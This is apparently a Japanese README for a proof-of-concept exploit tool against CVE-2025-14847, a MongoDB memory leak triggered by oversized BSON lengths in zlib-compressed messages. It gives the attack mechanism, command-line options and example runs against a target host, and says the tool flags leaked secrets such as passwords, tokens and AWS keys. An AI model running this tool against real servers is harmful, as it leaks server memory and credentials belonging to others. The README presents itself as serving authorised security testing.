
CVE-2025-14847 MongoDB メモリリークエクスプロイト
mongoExploit は、MongoDB のメモリリーク脆弱性である CVE-2025-14847 用の概念実証(PoC)エクスプロイトツールです。
このツールは、zlib 解凍処理のバグを利用して、BSON フィールド名を介してサーバーメモリをリークさせます。文書長を過大に設定した BSON ペイロードを構築することで、サーバーにリークされたメモリからヌルバイトに遭遇するまでフィールド名を読み取らせます。
このツールは、教育目的および許可されたセキュリティテストの目的にのみ使用してください。 作者は、このツールの誤用について一切責任を負いません。明示的なテスト許可を得ていないシステムに対しては使用しないでください。
python3 mongoExploit.py [options]
| Argument | Description | Default |
|---|---|---|
--host | ターゲットホストのIPまたはホスト名 | localhost |
--port | ターゲットMongoDBのポート | 27017 |
--min-offset | 最小文書長(オフセット開始) | 20 |
--max-offset | 最大文書長(オフセット終了) | 8192 |
--output | リークデータの出力ファイル | leaked.bin |
デフォルト設定で特定のターゲットをスキャンします:
python3 mongoExploit.py --host 192.168.1.10
より大きなオフセット範囲でさらにデータをスキャンします:
python3 mongoExploit.py --host 192.168.1.10 --max-offset 50000
特定のオフセット範囲をスキャンします:
python3 mongoExploit.py --host 192.168.1.10 --min-offset 100 --max-offset 20000
このツールは、興味深いリーク(10文字を超える文字列)をコンソールに表示し、収集されたすべての一意な断片を指定された出力ファイル(デフォルト: leaked.bin)に保存します。
また、以下のようなシークレットに似たパターンを強調表示しようとします:
passwordsecretkeytokenadminAKIA(AWSキー)